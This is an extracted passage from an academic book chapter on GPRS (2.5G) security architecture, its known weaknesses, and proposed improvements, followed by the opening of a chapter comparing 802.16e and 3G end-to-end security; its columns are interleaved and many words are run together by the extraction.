Pagliusi, 2002). However, GPRS differs from of a given geographical area, while BSC maintains
GSM in certain operational and service points, radio connections towards MSs and terrestrial
which require a different security analysis. This connectionstowardsthefixedpartofthenetwor
is because GPRS is based on IP, which is an open (core network).
and wide deployed technology that presents many The GPRS core network (CN) uses the network
vulnerable points. Similarly to IP networks, intrud- elements of GSM such as the home location regis-
ers to the GPRS system may attempt to breach ter (HLR), the visitor location register (VLR), the
the confidentiality, integrity, or availability, or (AuC) and the equipment
authentication centre
otherwise attempt to abuse the system in order to identity register (EIR). HLR is a database used
compromise services, defraud users, or any part for the management of permanent data of mobile
of it. Thus, the GPRS system is more exposed to users. VLR is a database of the service area visited
intruders compared to GSM. by an MS and contains all the related information
This chapter presents the security architecture required for the MS service handling. AuC main-
employed in 2.5G mobile systems focusing on tains security information related to subscribers
GPRS. More specifically, the security measures identity, while EIR maintains information related
applied to protect the mobile users, the radio ac- to mobile equipments’ identity. Finally, the mobile
cessnetwork,thefixedpartofthenetwork, and
service the centre (MSC) is a network ele-
switching
related data of GPRS are presented and analyzed ment responsible for circuit-switched services (e.g.,
in details. This analysis reveals the security weak- voice call) (3GPP TS 03.6, 2002).
nesses of the applied measures that may lead to As presented previously, GPRS reuses the ma-
the realization of security attacks by adversaries. jority of the GSM network infrastructure. However,
These attacks threaten network operation and data in order to build a packet-oriented mobile network
transfer through it, compromising end users and some new network elements (nodes) are required,
network security. To defeat the identified whichhandle risks, packet-basedtraffic.Thenewclass
current research activities on the GPRS security of nodes, called GPRS support nodes (GSN), is
propose a set of security improvements to the ex- responsible for the delivery and routing of data
isting GPRS security architecture. The rest of this packets between an MS and an external packet
chapter is organized as follows. The next section datanetwork(PDN)More . specifically, a
serving

Figure 1. GPRS network architecture
cn
gi
Auc
ggsn
Pstn H
gc
d Hlr gr gn
g Msc
f EIr gf sgsn gp
E vlr
A gb
bss
bsc
Abis Abis
bts bts
um
Ms
Auc: Authentication Center ggsn: Gateway GPRS Support Node

bts: Base Transceiver Station Hlr: Home Location Register
bsc: Base Station Controller Ms: Mobile Station
bss: Base Station Subsystem Msc: Mobile Switching Center
cn : Core Network sgsn: Serving GPRS Support Node
EIr: Equipment Identity Register vlr: Visited Location Register
GSN (SGSN) is responsible for the delivery of data gPrs sEcurIty ArcHItEcturE
packets from, and to, an MS within its service area.
Its tasks include packet routing and transfer, mo- In order to meet security objectives, GPRS em-
bility management, logical link management, and ploys a set of security mechanisms that constitutes
authentication and charging functions. A gateway the GPRS security architecture. Most of these
GSN (GGSN) acts as an interface between the mechanisms have been originally designed for
GPRS backbone and an external PDN. It converts GSM, but they have been modified to adapt to
the GPRS packets coming from the SGSN into the packet-oriented traffic nature and the GPRS
the appropriate packet data protocol (PDP) format network components. The GPRS security archi-
(e.g., IP), and forwards them to the corresponding tecture, mainly, aims at two goals: (1) to protect
PDN. Similar is the functionality of GGSN in the the network against unauthorized access, and (2)
opposite direction. The communication between to protect the privacy of users. It includes the fol-
GSNs (i.e., SGSN and GGSN) is based on IP tunnels lowing components (GSM 03.20, 1999):
through the use of the GPRS tunneling protocol
(GTP) (3GPP TS 09.60, 2002). • Subscriber identity module (SIM)
• Subscriberidentityconfidentiality
• Subscriber identity authentication

• User data and signaling confidentiality - be

Thesubscriber identityconfidentialityismain
tween the MS and the SGSN achieved by using a temporary mobile subscriber
• GPRS backbone security identity (TMSI) (3GPP TS 03.03, 2003; GSM
,) which
9 0 .2 3 1 identifies the mobile user in
subscriber Identity Module (sIM) both the wireless and wired network segments. The
TMSIhasalocalsignificanceandthusitmustbe
The subscription of a mobile user to a network is accompanied by the routing area identity (RAI) in
personalized through the use of a smart card named order to avoid confusions. The MS and the serving
SIM (ETSI TS 100 922, 1999). Each SIM card is VLR and SGSN only know the relation between
unique and related to a user. It has a microcom- the active TMSI and the IMSI. The allocation of
puter with a processor, ROM, persistent EPROM a new TMSI corresponds implicitly for the MS to
memory, volatile RAM, and an I/O interface. the de-allocation of the previous one. When a new
Its software consists of an operating system,
TMSI file to the MS, it is transmitted to
is allocated
system, and application programs (e.g., SIM apit in a ciphered mode. The MS stores the current
plication toolkit). The SIM card is responsible for TMSI and the associated RAI in a non-volatile
the authentication of the user by prompting for a memory, so that these data are not lost when the
code(PIN)the, identificationoftheuser - toisaswitched
MS net off.
work through keys, and the protection of user data Further to the TMSI, a temporary logical link
through cryptography. To achieve these functions identity (TLLI)GPP
3 ( TS)identifies
, 30 2 . 0
it contains a set of security objects including: also a GPRS user on the radio interface of a rout-
ingarea.SincetheTLLIhasalocalsignificance,
• A (4-digit) PIN code, which is used to lock when it is exchanged between the MS and the
the card preventing misuse; SGSN, it should be accompanied by the RAI. The
• A unique permanent identity of the mobile TLLI is either derived from the TMSI allocated by
user, named international mobile subscriber the SGSN or built by the MS randomly and thus,
identity (IMSI) (3GPP TS 03.03, 2003); providesidentityconfidentiality.Therelation
• A secret key, Ki, (128 bit) that is used for between the TLLI and the IMSI is only known in
authentication; and the MS and in the SGSN.
• An authentication algorithm (A3) and an
algorithm that generates encryption keys subscriber Identity Authentication
(A8) (GSM 03.20, 1999).
A mobile user that attempts to access the network
Since the SIM card of a GSM/GPRS subscriber mustfirstprovehis/heridentityto - it.Userauthe
contains security critical information, it should tication (3GPP TS 03.6, 2002) protects against
be manufactured, provisioned, distributed, and fraudulent use and ensures correct billing. GPRS
managed in trusted environments. usestheauthenticationprocedurealreadydefi
in GSM with the same algorithms for authentication
Subscriber Identity Confidentiality and generation of encryption key, and the same
secret key, Ki, (see Figure 2). However, from the
Thesubscriberidentityconfidentiality network deals with
side, the whole procedure is executed by
the privacy of the IMSI and the location of a mobile the SGSN (instead of the BS) and employs a dif-
user. It includes mechanisms for the protection of ferent random number (GPRS-RAND) and thus,
the permanent identity (IMSI) when it is transit produces a different signed response (GPRS-
ferred in signaling messages, as well as measures SRES) and encryption key (GPRS-Kc) than the
that preclude the possibility to derive it indirectly GSM voice counterpart.
from listening to specific information, such as authentication of a mobile user,
To achieve
addresses, at the radio path. the serving SGSN must possess security-related

Figure 2. GPRS authentication
Authentication request (GPRS-RAND)
ki ki
A3 A3
Authentication response (GPRS-SRES) ? check
ki
A8 A8
ki
sIM
gPrs-kc
gPrs-kc
data
A5 Protected data A5
data
fixed network of a
gPrs operator
informationforthespecificuser.Thisinformation ing algorithm (GPRS-A5) (3GPP TS 01.61, 2001),

is obtained by requesting the HLR/AuC of the which is also referred to as GPRS encryption
home network that the mobile user is subscribed. algorithm (GEA) and is similar to the GSM A5.
It includes a set of authentication vectors, each Currently, there are three versions of this algo-
of which includes a random challenge (GPRS- rithm: GEA1, GEA2, and GEA3 (that is actually
RAND), the related signed response (GPRS-SRES), A5/3), which are not publicly known and thus, it
andtheencryptionkeyGPRS- ( Kc)forthespecific
is difficult to perform attacks on them. The MS
subscriber. The authentication vectors are produced device (not the SIM-card) performs GEA using
by the home HLR/AuC using the secret key Ki of the encryption key (GPRS-Kc), since it is a strong
the mobile subscriber. algorithm that requires relatively high processing
During authentication the SGSN of the serv- capabilities. From the network side, the serving
ing network sends the random challenge (GPRS- SGSN performs the ciphering/deciphering func-
RAND) of a chosen authentication vector to the tionality protecting signaling and user data over
MS. The latter encrypts the GPRS-RAND by using the Um, Abis, and Gb interfaces.
the A3 hash algorithm, which is implemented in During authentication the MS indicates which
theSIMcard,andthesecretkey,Ki.Thefirst 23
version(s) of the GEA supports and the network
bits of the A3 output are used as a signed response (SGSN) decides on a mutually acceptable version
(GPRS-SRES) to the challenge (GPRS-RAND) and that will be used. If there is not a commonly accept-
are sent back to the network. The SGSN checks ed algorithm, the network (SGSN) may decide to
if the MS has the correct key, Ki, and, then, the release the connection. Both the MS and the SGSN
mobile subscriber is recognized as an authorized must cooperate in order to initiate the ciphering
user. Otherwise, the serving network (SN) rejects overtheradioaccessnetwork.Morespecifically,
the subscriber’s access to the system. The remaining the SGSN indicates whether ciphering should be
64 bits of the A3 output together with the secret used or not (which is also a possible option) in
key, Ki, are used as input to the A8 algorithm that the Authentication Request message, and the MS
produces the GPRS encryption key (GPRS-Kc). starts ciphering after sending the Authentication
Response message (see Figure 2).
data and signalling Protection GEA is a symmetric stream cipher algorithm
(see Figure 3) that uses three input parameters
User data and signaling protection over the GPRS (GPRS-Kc, INPUT, and DIRECTION) and pro-
radio access network is based on the GPRS cipher- duces an OUTPUT string, which varies between 5

Figure 3. GPRS ciphering

INPUT DIRECTION INPUT DIRECTION
GPRS-Kc GPRS-Kc
CIPHER CIPHER
ALGORITHM ALGORITHM
OUTPUT OUTPUT
PLAIN TEXT CIPHERED TEXT CIPHERED TEXT PLAIN TEXT
SGSN/MS MS/SGSN
and 1,600 bytes. GPRS-Kc (64 bits) is the encryp- signaling exchange in GPRS is mainly based on
tion key generated by the GPRS authentication the signaling system 7 (SS7) technology (3GPP TS
procedure and is never transmitted over the radio 09.02, 2004), which does not support any security
interface. The input (INPUT) parameter (32 bits) measure for the GPRS deployment. Similarly, the
is used as an additional input so that each frame GTP protocol that is employed for communication
is ciphered with a different output string. This between GSNs does not support security. Thus,
parameter is calculated from the logical link con- user data and signaling information in the GPRS
trol (LLC) frame number, a frame counter, and a backbone network are conveyed in cleartext expos-
value supplied by the SGSN called the input offset ing them to various security threats. In addition,
value (IOV). The IOV is set up during the negotia- inter-network communications (between different
tion of LLC and layer 3 parameters. Finally, the operators) are based on the public Internet, which
directionbit(DIRECTION)specifieswhether the IP spoofing to any malicious third party
enables
output string is used for upstream or downstream who gets access to it. In the sequel, the security
communication. measures applied to the GPRS backbone network
After the initiation of ciphering, the sender (MS are presented.
or SGSN) processes (bit-wise XOR) the OUTPUT The responsibility for security protection of
string with the payload (PLAIN TEXT) to produce the GPRS backbone as well as inter-network com-
the CIPHERED TEXT, which is sent over the radio munications belongs to mobile operators. They
interface. In the receiving entity (SGSN or MS), utilize private IP addressing and network address
the original PLAIN TEXT is obtained by bit-wise translation (NAT) (Srisuresh & Holdrege, 1999) to
XORed the OUTPUT string with the CIPHERED restrict unauthorized access to the GPRS backbone.
TEXT. When the MS changes SGSN, the encryp- Theymayalsoapplyfirewallsatthebordersofthe
tion parameters (e.g., GPRS-Kc, INPUT) are GPRS backbone network in order to protect it from
transferred from the old SGSN to the new SGSN, unauthorized penetrations. Firewalls protect the
through the (inter) routing area update procedure network by enforcing security policies (e.g., user
in order to guarantee service continuity. trafficaddressedtoanetworkelementisdiscarde
Using security policies the GPRS operator may
gPrs backbone security ensurethatonlytrafficinitiatedfromtheMSand
notfromtheInternetshouldpassthroughafirewal
The GPRS backbone network includes the This isdonefortworeasons:to
fixed ) 1 ( restricttrafficin
network elements and their physical connections order to protect the MS and the network elements
that convey user data and signaling information. from external attacks; and (2) to protect the MS

from receiving unrequested traffic. Unrequested Subscriber Identity Confidentiality

trafficmaybeunwantedforthemobile - subscrib
erssincetheypayforthetrafficreceived aswell.
A serious weakness of the GPRS security ar-
The GPRS operator may also want to disallow chitecture is related to the compromise of the
some bandwidth-demanding protocols prevent- confidentialityofsubscriberidentity.Specificall
ing a group of subscribers to consume so much whenever the serving network (VLR or SGSN)
bandwidth that other subscribers are noticeably cannot associate the TMSI with the IMSI, because
affected. In addition, application-level firewalls
of TMSI corruption or database failure, the SGSN
prevent direct access through the use of proxies should request the MS to identify itself by means
for services, which analyze application commands, of IMSI on the radio path. Furthermore, when the
perform authentication, and keep logs. user roams and the new serving network cannot
Since firewalls do not provide privacy contactand
the previous (the old serving network) or
confidentiality, the
virtual private network (VPN) cannot retrieve the user identity, then, the new
technology (Gleeson, Lin, Heinanen, Armitage, & serving network should also request the MS to
Malis, 2000) has to complement them to protect identify itself by means of IMSI on the radio path.
data in transit. A VPN is used for the authentication This fact may lead an active attacker to pretend to
and the authorization of user access to corporate be a new serving network, to which the user has to
resources, the establishment of secure tunnels reveal his/her permanent identity. In addition, in
between the communicating parties, and the en- both cases the IMSI that represents the permanent
capsulation and protection of the data transmitted user identity is conveyed in cleartext over the radio
by the network. In current GPRS implementations, interfaceviolatinguseridentityconfidential
pre-configured, static VPNs can be employed to
protect data transfer between GPRS network ele- subscriber Authentication
ments (e.g., an SGSN and a GGSN that belong
to the same backbone), between different GPRS The authentication mechanism used in GPRS also
backbone networks that belong to different mo- exhibits some weak points regarding security. More
bile operators, or between a GPRS backbone and specifically, the authentication procedure is o
a remote corporate private network. The border way and thus, it does not assure that a mobile user
gateway, which resides at the border of the GPRS is connected to an authentic serving network. This
backbone, is a network element that provides fact enables active attacks using a false BS identity.
firewall capabilities and also maintains static,
An adversary, who has the required equipment,
pre-configuredVPNstospecificpeers. may masquerade as a legitimate network element
mediating in the communication between the MS
and the authentic BS. This is also facilitated by the
gPrs sEcurIty wEAknEssEs absence of a data integrity mechanism on the radio
access network of GPRS, which defeats certain
Although GPRS have been designed with secu- network impersonation attacks. The results of this
rity in mind, it presents some essential security mediation may be the alternation or the intercep-
weaknesses, which may lead to the realization of tion of signaling information and communication
security attacks that threaten network operation data exchanged.
and data transfer through it. In the following, Another weakness of the GPRS authentication
the most prominent security weaknesses of the procedure is related to the implementation of the
GPRSsecurityarchitecturearebrieflyA3 presented
and A8 algorithms, which are often realized
and analyzed. in practise using COMP128. COMP128 is a keyed
hash function, which uses two 16-byte (128 bits)

inputs and produces a hash output of 12 bytes (96 the involved end users (humans) are not informed
bits)While
. theactualspecificationofwhether COMP182 their sessions are encrypted or not.
was never made public, the algorithm has been As encryption over the radio interface is op-
reverse engineered and cryptanalyzed (Barkan, tional, the network indicates to the MS whether
Biham, & Neller, 2003). Thus, knowing the secret and which type(s) of encryption it supports in
key, Ki, it is feasible for a third party to clone a the authentication request message, during the
GSM/GPRSSIM-card,sinceitsspecificationsGPRS are authentication procedure. If encryption is
widely available (ETSI TS 100 922, 1999). activated, the MS start ciphering after sending the
&helastweaknessoftheGPRSauthentication authentication response message and the SGSN
procedure is related to the network ability of re- starts ciphering/deciphering when it receives a
using authentication triplets. Each authentication valid authentication response message from the
triplet should be used only in one authentication MS. However, since these two messages are not
procedure in order to avoid man-in-the-middle protectedbyconfidentialityandintegrity - mecha
and replay attacks. However, this depends on the nisms (data integrity is not provided in the GPRS
mobile network operator (home and serving) and radio interface except for traditional non-crypto-
cannot be checked by mobile users. When the VLR graphic link layer checksums), an adversary may
of a serving network has used an authentication mediate in the exchange of authentication messages.
triplet to authenticate an MS, it shall delete the The results of this mediation might be either the
triplet or mark it as used. Thus, each time that the modificationofthenetworkandthe - MScapabili
VLR needs to use an authentication triplet, it shall ties regarding encryption, or the suppression of
use an unmarked one, in preference to a marked. encryption over the radio interface.
If there is no unmarked triplet, then the VLR shall
request fresh triplets from the home HLR. If fresh gPrs backbone
triplets cannot be obtained, because of a system
failure, the VLR may reuse a marked triplet. Thus, Based on the analysis of the GPRS security archi-
if a single triplet is compromised, a false BS can tecture (see the GPRS security architecture section)
impersonate a genuine GPRS network to the MS. it can be perceived that the GPRS security does
Moreover, as the false BS has the encryption key, not aim at the GPRS backbone and the wire-line
Kc, it will not be necessary for the false BS to connections, but merely at the radio access net-
suppress encryption on the air interface. As long work and the wireless path. Thus, user data and
as the genuine SGSN is using the compromised signaling information conveyed over the GPRS
authentication triplet, an attacker could also im- backbone may experience security threats, which
personate the MS and obtain session calls that are degrade the level of security supported by GPRS.
paid by the legitimate subscriber. In the following, the security weaknesses of the
GPRS security architecture that are related to the
data and signalling Protection GPRS backbone network for both signaling and
data plane are presented and analyzed.
An important weakness of the GPRS security
architecture is related to the fact that the encryp- Signaling Plane
tion of signalling and user data over the highly
exposed radio interface is not mandatory. Some As mentioned previously, the SS7 technology used
GPRS operators, in certain countries, never switch for signaling exchange in GPRS does not support
on encryption in their networks, since the legal security protection. Until recently, this was not
framework in these countries do not permit that. perceived to be a problem since SS7 networks
Hence,inthesecasessignalinganddata traffic
belonged toare
a small number of large institutions
conveyed in cleartext over the radio path. This situ- (telecom operator). However, the rapid deploy-
ation is becoming even more risky from the fact that ment of mobile systems and the liberalization of

the telecommunication market have dramatically protectionofusers’datainthefixedsegmentofthe

increasedthenumberofoperatorsfor ( GPRS
both fixed mainly relies on two independent
network
and mobile networks) that are interconnected and complementary technologies, which are not
through the SS7 technology. This fact provokes a undertaken by GPRS but from the network opera-
significant threat to the GPRS network tors.security,
Thesetechnologiesinclude:firewalls )1( that
since it increases the probability of an adversary to enforce security policies to a GPRS core network
get access to the network or a legitimate operator thatbelongstoanoperator;andpre- ) 2( configured
to act maliciously. VPNsthatprotectspecificnetworkconnections.
The lack of security measures in the SS7 tech- However,firewallswereoriginallyconceivedto
nology used in GPRS results also in the unprotected addresssecurityissuesforfixednetworksandthu
exchange of signaling messages between a VLR are not seamlessly applicable in mobile networks.
and a VLR/HLR, or a VLR and other fixed net - They attempt to protect the cleartext transmit-
work nodes. Although these messages may include ted data in the GPRS backbone from external
critical information for the mobile subscribers attacks, but they are inadequate against attacks
and the networks operation like ciphering keys, that originate from malicious mobile subscribers
authentication data (e.g., authentication triplets), as well as from network operator personnel or
user subscription data (e.g., IMSI), user billing data, any other third party that gets access to the GPRS
network billing data, and so forth, they are conveyed core network. Another vital issue regarding the
in a cleartext within the serving network as well as deployment of firewalls in GPRS has to do with
between the home network and the serving network. the consequences of mobility. The mobility of a
For example, the VLR of a serving network may user may imply roaming between networks and
use the IMSI to request authentication data for a operators, which possibly results in the changing
single user from its home network, and the latter of the user address. This fact in conjunction with
forwards them to the requesting VLR without any the static configuration of firewalls - may poten
security measure. Thus, the exchanges of signaling tially lead to discontinuity of service connectivity
messages, which are based on SS7, may disclose for the mobile user. Moreover, in some cases the
sensitive data of mobile subscribers and networks, security value of firewalls is considered limite
since they are conveyed over insecure network as they allow direct connection to ports without
connections without security precautions. distinguishing services.
Similarlytofirewalls,theVPNtechnologyfails
Data Plane to provide the necessary exibility fl required by
typical mobile users. Currently, VPNs for GPRS
Similarly to the signaling plane, the data plane of subscribers are established in a static manner
theGPRSbackbonepresentssignificant security
between the border gateway of a GPRS network
weaknesses, since the introduction of IP technology and a remote security gateway of a corporate
in the GPRS core shifts towards open and easily private network. This fact allows the realization
accessible network architectures. In addition, the of VPNs only between a security gateway of a
data encryption mechanism employed in GPRS large organization and a mobile operator, when
does not extend far enough towards the core net- a considerable amount of traffic requires - protec
work, also resulting in a cleartext transmission of tion. Thus, this scheme can provide VPN services
user data in it. Thus, a malicious user, which gains neither to individual mobile users that may require
access to the network, may either obtain access to on demand VPN establishment, nor to enterprise
sensitive data traffic or provide-unauthorized/ users that may roam in internationally. In addition,
correct information to mobile users and network staticVPNshavetobereconfiguredeverytimethe
components. As presented previously, the security VPN topology or VPN parameters change.

currEnt rEsEArcH on gPrs mobile IPsec-based VPN, dynamically. End-user

sEcurIty security is applied by using application layer
solutions such as the secure sockets layer (SSL)
The analyzed security weaknesses of the GPRS protocol (Gupta & Gupta, 2001). SSL is the default
security architecture increase the risks associated Internet security protocol that provides point-to-
withtheusageofGPRSnetworksinfluencing their
point security by establishing a secure channel on
deployment, which realizes the mobile Internet. In top of TCP. It supports server authentication us-
order to defeat some of these risks, a set of secu- ingcertificates,dataconfidentiality,andmessag
rity improvements to the existing GPRS security integrity.Ontheotherhand,IPsecprotectstraffic
architecture may be incorporated. Additionally, on a per connection basis and thus is independent
some complementary security measures, which from the applications that run above it. An IPsec-
have been originally designed for fixedbased network
VPN is used for the authentication and the
and aim at enhancing the level of security that authorization of user access to corporate resources,
GPRS supports, may be applied (Xenakis, 2006). the establishment of secure tunnels between the
Inthefollowing,thespecificsecurityimprovements communicating parties, and the encapsulation and
and the application of the complementary security protection of the data transmitted by the network.
measuresarebrieflypresentedandanalyzed. On-demand VPNs that are tailored to specific
security needs are especially useful for GPRS
sIM card users, which require any-to-any connectivity in
an ad hoc fashion. Regarding the deployment of
The majority of the security weaknesses that are mobile VPNs over the GPRS infrastructure, three
related to a MS and the SIM card of a mobile user alternative security schemes have been proposed:
have to do with the vulnerabilities of COMP128. (1) the end-to-end (Xenakis, Gazis, Merakos,
To address these, the old version of COMP128 2002), (2) the network-wide (Xenakis, Merakos:
(currently named as COMP128-1) is replaced by IEEE Network, 2002), and (3) the border-based
two newer versions COMP128-2 and COMP128- (Xenakis, Merakos: IEEE PIMRC, 2002). These
3, which defeat the known weaknesses. There schemes mainly differ in the position where the
is an even newer version COMP128-4, which is security functionality is placed within the GPRS
based on the 3GPP algorithm MILENAGE that network architecture (MS, SGSN, and GGSN),
uses advanced encryption standard (AES). In and whether data in transit are ever in cleartext
addition, it is mentioned to the GPRS operators or available to be tapped by outsiders.
that the COMP128 algorithm is only an example
algorithm and that every operator should use its signaling Plane of the gPrs
own algorithm in order to support an acceptable backbone
level of security (Xenakis, 2006).
The lack of security measures in the signaling plane
user data of the GPRS backbone gives the opportunity to an
adversary to retrieve critical information such as
User data conveyed over the GPRS backbone the permanent identities of mobile users (IMSI),
and the public Internet most likely remain un- temporary identities (TMSI, TLLI), location in-
protected (except for the cases that the operator formation, authentication triplets (RAND, SRES,
supports pre-established VPNs over the public Kc), charging and billing data, and so forth. The
Internet) and thus are exposed to various threats. possession of this information enables an attacker
The level of protection that GPRS provides to the to identify a mobile user, to track his/her location,
data exchanged can be improved by employing to decipher the user data transferred over the radio
two security technologies: (1) the application of interface, to over bill him/her, and so forth. To ad-
end-user security, and (2) the establishment of dress this inability of GPRS, it has been proposed
0
the incorporation of the network domain security the realization of security attacks that threaten net-
(NDS) features (Xenakis, 2006; Xenakis & Mera- work operations and data transfer through it. These
kos, 2004) into the GPRS security architecture. weaknesses are related to: (1) the compromise of the
NDS features, which have been designed for the confidentialityofsubscriber’sidentity,sinceitm
latter version of UMTS, ensure that signaling ex- be conveyed unprotected over the radio interface;
changes in the backbone network as well as in the (2) the inability of the authentication mechanism to
whole wire-line network are protected. For signal- perform network authentication; (3) the possibil-
ing transmission in GPRS the SS7 and IP protocol ity of using COMP128 algorithm (which has been
architectures are employed, which incorporate the cryptoanalyzed) for A3 and A8 implementations;
mobile application part (MAP) (3GPP TS 09.02, (4) the ability of reusing authentication triplets;
2004) and the GTP protocol (3GPP TS 09.60, (5) the possibility of suppressing encryption over
2002), respectively. In NDS both architectures are the radio access network or modifying encryption
designed to be protected by standard procedures parameters; and (5) the lack of effective security
based on existing cryptographic techniques. Spe- measures that are able to protect signaling and
cifically,theIP-basedsignalingcommunications user data transferred over the GPRS backbone
will be protected at the network level by means network. To defeat some of these risks, a set of se-
of the well-known IPsec suite (Kent & Atkinson, curity improvements to the existing GPRS security
1998). On the other hand, the realization of pro- architecture may be incorporated. Additionally,
tection for the SS7-based communications will be some complementary security measures, which
accomplished at the application layer by employing have been originally designed for fixed network
specific security protocols (Xenakis & Merakos, and aim at enhancing the level of security that
2004). However, until now only the MAP protocol GPRS supports, may be applied.
from the SS7 architecture is designed to be pro-
tected by a new security protocol named MAPsec
(3GPP TS 33.200 2002). AcknowlEdgMEnt
Work supported by the project CASCADAS

conclusIon (IST-027807) funded by the FET Program of the
European Commission.
This chapter has presented the security architec-
ture employed in 2.5G mobile systems focusing rEfErEncEs
on GPRS. This architecture comprises a set of
measures that protect the mobile users, the radio 3rd Generation Partnership Project (3GPP) TS
accessnetwork,thefixedpartofthenetwork, and(2002). GPRS service description,
03.6 (V7.9.0).
the related data of GPRS. Most of these measures Stage 2. Sophia Antipolis Cedex, France: Author.
have been originally designed for GSM, but they Retreived from ftp://ftp.3gpp.org/specs/2006-12/
havebeenmodifiedtoadapttothepacket- oriented
R1998/03_series
trafficnatureandtheGPRSnetworkcomponents.
The operational differences between the application 3rd Generation Partnership Project (3GPP) TS 09.60
of these measures in GSM and GPRS have been (V7.10.0). (2002). GPRS tunneling protocol (GTP)
outlined and commented. In addition, the security across the Gn and Gp interface. Sophia Antipolis
measures that can be applied by GPRS operators Cedex, France: Author.Retrived from ftp://ftp.3gpp.
to protect the GPRS backbone network and inter- org/specs/2006-12/R1998/09_series
network communications, which are based on IP, 3rd Generation Partnership Project (3GPP) TS
have been explored. Although GPRS has been 03.03 (v7.8.0). (2003). Numbering, addressing and
designed with security in mind, it presents some identification. Sophia Antipolis Cedex, France: Au-
essential security weaknesses, which may lead to thor. Retrieved from ftp://ftp.3gpp.org/specs/2006-
12/R1998/03_series

3rd Generation Partnership Project (3GPP) TS Pagliusi, P. (2002). A contemporary foreword on

01.61 (v7.0.0). (2001). GPRS ciphering algorithm GSM security. In Proceedings of the Infrastruc-
requirements. Sophia Antipolis Cedex, France: Au- ture Security International Conference (InfraSec)
thor. Retrieved from ftp://ftp.3gpp.org/specs/2006- (LNCS 2437, pp. 129-144). Springer-Verlag.
12/R1999/01_series
Srisuresh, P., & Holdrege, M. (1999). IP network
3rd Generation Partnership Project (3GPP) TS address translator (NAT) terminology and consid-
09.02 (v7.15.0). (2004). Mobile application part erations (RFC 2663). Retrieved from http://www.
MAP)
( specification. Sophia Antipolis Cedex, faqs.org/rfcs/rfc2663.html
France: Author. Retrieved from ftp://ftp.3gpp.
Xenakis, C. (2006). Malicious actions against the
org/specs/2006-12/R1998/09_series
GPRS technology. JournalinComputerVirology,
3rd Generation Partnership Project (3GPP) TS 2(2), 121-133.
33.200 (v4.3.0), (2002). G3 security; network
Xenakis, C., Gazis, E., & Merakos, L. (2002). Se-
domain security; MAP application layer - secu
cure VPN deployment in GPRS mobile network.
rity. Sophia Antipolis Cedex, France: Author.
In Proceedings of European Wireless, Florence,
Italy (pp. 293-300).
Rel-4/33_series
Xenakis, C., & Merakos, L. (2002). On demand
Barkan, E., Biham, E., & Neller, N. (2003). Instant
network-wide VPN deployment in GPRS. IEEE
ciphertext-only cryptanalysis of GSM encrypted
Network,6(1 6), 28-37.
communication. In Proceedings of Advances in
Cryptology (CRYPTO 2003) (LNCS 2729, 600- Xenakis, C., & Merakos, L. (2002). Dynamic net-
616). work-based secure VPN deployment in GPRS. In
Proceedings of IEEE PIMRC, Lisboa, Portugal,
ETSI TS 100 922 (v7.1.1). (1999). Subscriber identity
(pp. 1260-1266).
modules (SIM) functional characteristics.Retrieved
from http://pda.etsi.org/pda/queryform.asp Xenakis, C., & Merakos, L. (2004). Security in
Gleeson, B., Lin, A., Heinanen, J., Armitage, G.,
munications, 27(7), 638-650.
& Malis, A. (2000). A framework for IP based
virtual private networks (RFC 2764). Retrieved
GSM 03.20. (1999). Security related network kEy tErMs
functions. Retrieved from ftp://ftp.3gpp.org/
specs/2006-12/R1999/03_series General Packet Radio Service (GPRS):
GPRS is a mobile data service available to users
Gupta, V., & Gupta, S. (2001). Securing the wire- of GSM.
less Internet. IEEE Communications Magazine,
93 (12), 68-74. Global System for Mobile Communications
(GSM): GSM is the most popular standard for
Kent, S., & Atkinson, R. (1998). Security ar- mobile phones in the world.
chitecture for the Internet protocol (RFC 2401).
Retrieved from http://www.javvin.com/protocol/ GPRS Tunneling Protocol (GTP): GTP is an
rfc2401.pdf IP-based protocol that carries signaling and user
data with the GPRS core network.
Mitchell, C. (2001). The security of the GSM air
interface protocol. Retrieved August, 2001, from International Mobile Subscriber Identity
http://www.ma.rhul.ac.uk/techreports/ (IMSI): IMSI is a unique number associated with
all GSM network mobile phone users.

Second Generation (2G): 2G is a short for sec- Subscriber Identity Module (SIM): SIM is a
ond-generation wireless telephone technology. removable smart card for mobile phones that stores
networkspecificinformationusedtoauthentica
Second and a Half Generation (2.5G): 2.5G
and identify subscribers on the network.
is used to describe 2G systems that have imple-
mented a packet-switched domain in addition to Temporary Mobile Subscriber Identity
the circuit-switched domain. (TMSI): TMSI is a randomly allocated number
that is given to the mobile the moment it is switched
Signaling System 7 (SS7): SS7 is a set of te-
on and serves as a temporary identity between the
lephony signaling protocols which are used to set
mobile and the network.
up the vast majority of the world’s public switched
telephone network telephone calls.

Chapter XXIII
End-to-End Security
Comparisons Between IEEE
802.16e and 3G Technologies
Sasan Adibi
University of Waterloo, Canada
Gordon B. Agnew
AbstrAct
Security measures of mobile infrastructures have always been important from the early days of the
creation of cellular networks. Nowadays, however, the traditional security schemes require a more
fundamental approach to cover the entire path from the mobile user to the server. This fundamental ap-
proach is so-called end-to-end (E2E) security coverage. The main focus of this chapter is to discuss such
architectures for IEEE 802.16e (Mobile-WiMAX) and major third generation(3G) cellular networks.
The E2E implementations usually contain a complete set of algorithms, protocol enhancements (mutual
identification, authentications, and authorization), including the very large-scale
implementations. This chapter discusses various proposals at the protocol level.
IntroductIon variety of forms using IP security (IPsec), secure

socket layer (SSL)/transport layer security (TLS),
Mobile-WiMAX (802.16e) is a fourth generation OpenPGP, and S/MIME (Gallop, 2005). The E2E
(4G) candidate for mobility and is expected to architectures of major 3G technologies including
address many of the current issues we face in global system for mobile communications (GSM),
3G technologies. E2E security scheme is one of general packet radio service (GRPS), and code
the major issues, which is currently addressed in division multiple access (CDMA) and 802.16e will
be discussed in this chapter.
End-to-End Security Comparisons Between IEEE 802.16e and 3G Technologies
The management of the sections is as fol- • Data integrity: This guarantees that the
lows: the next section will discuss details about data received has not been altered by an un-
the ultimate security features attributed to 3G authorized entity. One method of doing this
technologies. The GSM section will discuss the is through the application of a hash function
security weakness in GSM’s initial draft and the to the data stream
E2E solution to overcome its weakness. The fourth • Security between networks: Networks are
and fifth sections talk about GPRS and CDMA interconnected using secure wired links,
respectively. The Mobile-WiMAX section opens mainly using IPSec tunneling mechanism.
the discussion on 802.16e, the candidate for the • Secure international mobile subscriber
4G wireless systems, which contains the security identity (IMSI) usage: The first-time user
weakness of 802.16e’s initial draft and the E2E is assigned an initial IMSI number by the
solution. A thorough comparison and references home network.
will be given in the last two sections. • Stronger security scope: Security is based
within the radio network controller (RNC)
objEctIvEs of sEcurIty rather than the base station (BS). An RNC
fEAturEs for 3g/MobIlE-wIMAx is responsible for controlling and managing
the multiple BSs including the utilization of
